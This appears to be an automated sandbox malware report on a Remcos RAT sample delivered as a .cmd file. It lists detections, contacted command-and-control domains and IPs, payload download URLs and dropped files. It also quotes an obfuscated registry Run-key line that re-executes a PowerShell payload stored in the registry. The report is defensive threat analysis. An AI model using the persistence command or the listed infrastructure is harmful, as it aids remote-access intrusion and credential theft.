                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538407 Sample: rIMG465244247443GULFORDEROp... Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 44 pelele.duckdns.org 2->44 46 plieltd.top 2->46 48 geoplugin.net 2->48 66 Suricata IDS alerts for network traffic 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Multi AV Scanner detection for submitted file 2->70 74 10 other signatures 2->74 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 72 Uses dynamic DNS services 44->72 process4 signatures5 76 Early bird code injection technique detected 9->76 78 Writes to foreign memory regions 9->78 80 Found suspicious powershell code related to unpacking or dynamic code loading 9->80 82 Queues an APC in another process (thread injection) 9->82 14 msiexec.exe 8 18 9->14         started        19 conhost.exe 9->19         started        84 Suspicious powershell command line found 12->84 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 50 pelele.duckdns.org 185.236.203.101, 49738, 49739, 49741 M247GB Romania 14->50 52 geoplugin.net 178.237.33.50, 49740, 80 ATOM86-ASATOM86NL Netherlands 14->52 40 C:\Users\user\AppData\Local\Temp\biljl.vbs, data 14->40 dropped 42 C:\ProgramData\remcos\logs.dat, data 14->42 dropped 56 Detected Remcos RAT 14->56 58 Tries to steal Mail credentials (via file registry) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Installs a global keyboard hook 14->62 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 54 plieltd.top 172.67.155.139, 443, 49730, 49737 CLOUDFLARENETUS United States 21->54 64 Found suspicious powershell code related to unpacking or dynamic code loading 21->64 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 86 Tries to harvest and steal browser information (history, passwords, etc) 25->86 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                rIMG465244247443GULFORDEROpmagasinering.cmd24%VirustotalBrowse
                rIMG465244247443GULFORDEROpmagasinering.cmd18%ReversingLabsScript-PowerShell.Backdoor.Remcos

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                pelele.duckdns.org2%VirustotalBrowse
                plieltd.top0%VirustotalBrowse
                geoplugin.net0%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://www.imvu.comr0%URL Reputationsafe
                http://www.imvu.comr0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                http://plieltd.top0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                pelele.duckdns.org
                		185.236.203.101
                		truetrueunknown
                plieltd.top
                		172.67.155.139
                		truefalseunknown
                geoplugin.net
                		178.237.33.50
                		truefalseunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://plieltd.top/Underbyggelse.aaffalse
                  		unknown
                  https://plieltd.top/FevmSBTRsrPt160.binfalse
                    		unknown
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://plieltd.toppowershell.exe, 00000002.00000002.1787742509.0000012081D81000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    http://www.imvu.comrmsiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.microsoft.cwmsiexec.exe, 00000009.00000003.2092467601.0000000009300000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2092557647.0000000009300000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=WbhvF678.tmp.13.drfalse
                        		unknown
                        http://www.imvu.comtamsiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhvF678.tmp.13.drfalse
                            		unknown
                            https://aefd.nelreports.net/api/report?cat=bingthbhvF678.tmp.13.drfalse
                              		unknown
                              https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhvF678.tmp.13.drfalse
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.nirsoft.netmsiexec.exe, 0000000D.00000002.2249718163.0000000002B24000.00000004.00000010.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://aefd.nelreports.net/api/report?cat=bingaotakbhvF678.tmp.13.drfalse
                                    		unknown
                                    https://deff.nelreports.net/api/report?cat=msnbhvF678.tmp.13.drfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&FrbhvF678.tmp.13.drfalse
                                      		unknown
                                      https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhvF678.tmp.13.drfalse
                                        		unknown
                                        https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&FrbhvF678.tmp.13.drfalse
                                          		unknown
                                          http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		unknown
                                            https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhvF678.tmp.13.drfalse
                                              		unknown
                                              https://www.google.commsiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		unknown
                                                https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhvF678.tmp.13.drfalse
                                                  		unknown
                                                  http://geoplugin.net/json.gpHmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://maps.windows.com/windows-app-web-linkbhvF678.tmp.13.drfalse
                                                      		unknown
                                                      https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvF678.tmp.13.drfalse
                                                        		unknown
                                                        https://contoso.com/powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://geoplugin.net/json.gpTmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhvF678.tmp.13.drfalse
                                                            		unknown
                                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.nirsoft.net/msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		unknown
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhvF678.tmp.13.drfalse
                                                                		unknown
                                                                https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhvF678.tmp.13.drfalse
                                                                  		unknown
                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhvF678.tmp.13.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://www.office.com/bhvF678.tmp.13.drfalse
                                                                    		unknown
                                                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1808977051.000001209006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhvF678.tmp.13.drfalse
                                                                      		unknown
                                                                      https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhvF678.tmp.13.drfalse
                                                                        		unknown
                                                                        https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhvF678.tmp.13.drfalse
                                                                          		unknown
                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://geoplugin.net/json.gplmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhvF678.tmp.13.drfalse
                                                                              		unknown
                                                                              https://plieltd.toppowershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1787742509.000001208164A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://geoplugin.net/json.gpkmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://go.micropowershell.exe, 00000002.00000002.1787742509.0000012080BBB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://plieltd.top/Underbyggelse.aafPpowershell.exe, 00000002.00000002.1787742509.000001208022C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://crl.microBpowershell.exe, 00000004.00000002.1996067162.0000000007B57000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhvF678.tmp.13.drfalse
                                                                                          		unknown
                                                                                          http://www.imvu.commsiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225662972.0000000002D2D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000F.00000003.2225640683.0000000002D2D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://aefd.nelreports.net/api/report?cat=wsbbhvF678.tmp.13.drfalse
                                                                                            		unknown
                                                                                            https://contoso.com/Iconpowershell.exe, 00000004.00000002.1983290797.0000000005F27000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://geoplugin.net/json.gptmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhvF678.tmp.13.drfalse
                                                                                                		unknown
                                                                                                http://geoplugin.net/json.gpzmsiexec.exe, 00000009.00000003.2203587512.00000000092F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1996067162.0000000007B20000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhvF678.tmp.13.drfalse
                                                                                                      		unknown
                                                                                                      https://aefd.nelreports.net/api/report?cat=bingaotbhvF678.tmp.13.drfalse
                                                                                                        		unknown
                                                                                                        https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhvF678.tmp.13.drfalse
                                                                                                          		unknown
                                                                                                          https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhvF678.tmp.13.drfalse
                                                                                                            		unknown
                                                                                                            https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhvF678.tmp.13.drfalse
                                                                                                              		unknown
                                                                                                              https://aefd.nelreports.net/api/report?cat=bingrmsbhvF678.tmp.13.drfalse
                                                                                                                		unknown
                                                                                                                https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhvF678.tmp.13.drfalse
                                                                                                                  		unknown
                                                                                                                  https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                                    		unknown
                                                                                                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhvF678.tmp.13.drfalse
                                                                                                                      		unknown
                                                                                                                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1787742509.0000012080001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhvF678.tmp.13.drfalse
                                                                                                                        		unknown
                                                                                                                        https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhvF678.tmp.13.drfalse
                                                                                                                          		unknown
                                                                                                                          https://plieltd.top/Underbyggelse.aafXR$lXpowershell.exe, 00000004.00000002.1967209792.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://aka.ms/pscore6lBtqpowershell.exe, 00000004.00000002.1967209792.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhvF678.tmp.13.drfalse
                                                                                                                                		unknown
                                                                                                                                http://www.ebuddy.commsiexec.exe, msiexec.exe, 0000000F.00000002.2225859167.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown

                                                                                                                                World Map of Contacted IPs

                                                                                                                                • No. of IPs < 25%
                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                • 75% < No. of IPs

                                                                                                                                Public IPs

                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                172.67.155.139
                                                                                                                                		plieltd.topUnited States
                                                                                                                                		13335CLOUDFLARENETUSfalse
                                                                                                                                185.236.203.101
                                                                                                                                		pelele.duckdns.orgRomania
                                                                                                                                		9009M247GBtrue
                                                                                                                                178.237.33.50
                                                                                                                                		geoplugin.netNetherlands
                                                                                                                                		8455ATOM86-ASATOM86NLfalse

                                                                                                                                General Information

                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                Analysis ID:1538407
                                                                                                                                Start date and time:2024-10-21 08:33:06 +02:00
                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                Overall analysis duration:0h 7m 30s
                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                Report type:full
                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                Number of analysed new started processes analysed:18
                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                Number of existing processes analysed:0
                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                Number of injected processes analysed:0
                                                                                                                                Technologies:
                                                                                                                                • HCA enabled
                                                                                                                                • EGA enabled
                                                                                                                                • AMSI enabled
                                                                                                                                Analysis Mode:default
                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                Sample name:rIMG465244247443GULFORDEROpmagasinering.cmd
                                                                                                                                Detection:MAL
                                                                                                                                Classification:mal100.troj.spyw.evad.winCMD@22/14@8/3
                                                                                                                                EGA Information:
                                                                                                                                • Successful, ratio: 60%
                                                                                                                                HCA Information:
                                                                                                                                • Successful, ratio: 97%
                                                                                                                                • Number of executed functions: 172
                                                                                                                                • Number of non-executed functions: 251
                                                                                                                                Cookbook Comments:
                                                                                                                                • Found application associated with file extension: .cmd

                                                                                                                                Warnings

                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 3272 because it is empty
                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6852 because it is empty
                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                Simulations

                                                                                                                                Behavior and APIs

                                                                                                                                TimeTypeDescription
                                                                                                                                02:33:59API Interceptor91x Sleep call for process: powershell.exe modified
                                                                                                                                07:34:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Gummicheckene %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)
                                                                                                                                07:34:46AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Gummicheckene %Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)

                                                                                                                                Joe Sandbox View / Context

                                                                                                                                IPs

                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                185.236.203.101rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                  17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                    na.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                      DSpWOKW7zn.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                        Formularz instrukcji p#U0142atno#U015bci Millennium.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtfGet hashmaliciousRemcosBrowse
                                                                                                                                            178.237.33.501729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                                                                            lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                                                                            Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • www.geoplugin.net/xml.gp?ip=SEU_IP
                                                                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • geoplugin.net/json.gp
                                                                                                                                            Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • geoplugin.net/json.gp

                                                                                                                                            Domains

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            plieltd.toprIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 104.21.56.189
                                                                                                                                            geoplugin.net1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            pelele.duckdns.orgrIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 185.236.203.101

                                                                                                                                            ASNs

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            CLOUDFLARENETUSDocumenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 104.26.13.205
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                            • 104.21.53.8
                                                                                                                                            #U304a#U898b#U7a4d#U308a#U4f9d#U983c.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                                                                            • 188.114.97.3
                                                                                                                                            RFQ-KTE-07102024.pdf.scrGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                            • 188.114.96.3
                                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                            • 104.21.53.8
                                                                                                                                            https://cambridge.pl/testy-poziomujaceGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.22.58.91
                                                                                                                                            http://sustainability-bunnings.comGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.18.43.2
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.206.204
                                                                                                                                            https://app.creatopy.com/share/d/qvnqyxdo8o7mGet hashmaliciousUnknownBrowse
                                                                                                                                            • 104.17.223.152
                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                            • 172.67.206.204
                                                                                                                                            M247GBbin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                            • 38.202.237.70
                                                                                                                                            1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 172.111.244.103
                                                                                                                                            lsAXde4em3.exeGet hashmaliciousQuasarBrowse
                                                                                                                                            • 128.0.1.24
                                                                                                                                            la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 45.89.173.108
                                                                                                                                            arm7.elfGet hashmaliciousUnknownBrowse
                                                                                                                                            • 38.202.225.93
                                                                                                                                            JVxDWS9r3H.msiGet hashmaliciousMatanbuchusBrowse
                                                                                                                                            • 193.109.85.43
                                                                                                                                            YM10RsQfhm.msiGet hashmaliciousMatanbuchusBrowse
                                                                                                                                            • 193.109.85.31
                                                                                                                                            R7xCGuaxlx.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                            • 89.238.176.6
                                                                                                                                            vYGwWQ2LHj.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 89.238.176.6
                                                                                                                                            9IreEhm9Hk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 89.238.176.6
                                                                                                                                            ATOM86-ASATOM86NL1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            duEsmKBlGr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            lA0Z0vjXfA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            172926254156daf582728190320bacb622ccd105a50446fe4e74bbec68be10e3a78d1b71e6763.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SKM_0001810-01-2024-GL-3762.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            SecuriteInfo.com.Variant.Ulise.323893.7366.1016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Ibnh3BCQSQ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            nicetokissthebestthingsiwantotgetmebackwith.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            rIMGTR657365756.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                            • 178.237.33.50
                                                                                                                                            Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                                                                                            • 178.237.33.50

                                                                                                                                            JA3 Fingerprints

                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eDocumenti di spedizione.bat.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                            • 172.67.155.139
